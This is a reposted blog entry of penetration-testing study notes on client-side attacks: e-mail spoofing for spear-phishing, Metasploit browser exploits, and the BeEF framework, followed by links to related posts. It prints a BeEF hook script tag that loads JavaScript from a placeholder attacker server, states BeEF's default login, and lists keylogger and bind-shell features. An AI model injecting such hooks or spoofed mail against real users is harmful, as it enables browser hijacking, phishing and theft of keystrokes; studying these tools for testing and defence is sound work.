Kali进行web渗透笔记(九)
来源:互联网 发布:淘宝代销怎么设置运费 编辑:程序博客网 时间:2024/06/08 18:59
Exploiting the Client Using Attack Frameworks
- spear-phing e-mail attack:Choosing your own mail server has one distinct advantage:it allows you to spoof an e-mail address and,if the victim’s mail server does not performs reverse DNS lookups,the e-mail is sure to hit the victim’s mailbox.
- Metasploit browser exploit
Browser exploitation framework(BeEf):exploiting XSS flaws,the tool can also make web browsers attack other websites using injected JavaScript.
- The BeEF attack platform can generate and deliver payloads directly to the target web browser.an attractive tool for social engineering attacks are the different types of modules,and its ability to control many web browsers at the same time using something known as a hook.
BeEF consists of two major components:
- A server application that manages the hooked clients,also known as zombies .
- A JavaScript hook that runs in the web browser of the victim
An example of a hook is shown in the following code .This code iss injected in a HTML file that is downloaded by the web browser:
<script type="text/javascript" src="http://<BeEF_server_IP>:3000/hook.js></script>"
- The default username and password to log into the web interface is beef.
Some of the features and usses og the BeEF tool are listed as follows:
- Port scanner
- Key Logger
- Browsser information gathering
- Bind shell
- Network Mapping
- Metasploit integration
0 0
- Kali进行web渗透笔记(九)
- Kali进行web渗透笔记(一)
- Kali进行web渗透笔记(二)
- Kali进行web渗透笔记(三)
- Kali进行web渗透笔记(四)
- Kali进行web渗透笔记(五)
- Kali进行web渗透笔记(六)
- Kali进行web渗透笔记(七)
- Kali进行web渗透笔记(八)
- Kali进行web渗透笔记(十)
- Kali进行web渗透笔记(十一)
- kali linux web渗透测试学习笔记
- kali linux web渗透测试学习笔记
- 【安全牛学习笔记】Kali实战-Web渗透
- 搭建Web版Kali Linux渗透系统
- 《Web渗透测试使用kali linux》pdf
- Kali Linux Web 渗透测试秘籍 第一章 配置 Kali Linux
- 避免Vm桥接,使用Kali进行内网渗透测试
- Android UI(二)
- 正则表达式使用
- Chromium网页Pending Layer Tree激活为Active Layer Tree的过程分析
- 我的第一个公众号
- Kali进行web渗透笔记(八)
- Kali进行web渗透笔记(九)
- 第一篇博文
- Kali进行web渗透笔记(十)
- Kali进行web渗透笔记(十一)
- C#猜拳游戏
- 编译器gcc与g++的区别
- Wireshark笔记
- Linux服务器集群LVS
- 漏洞综合利用总结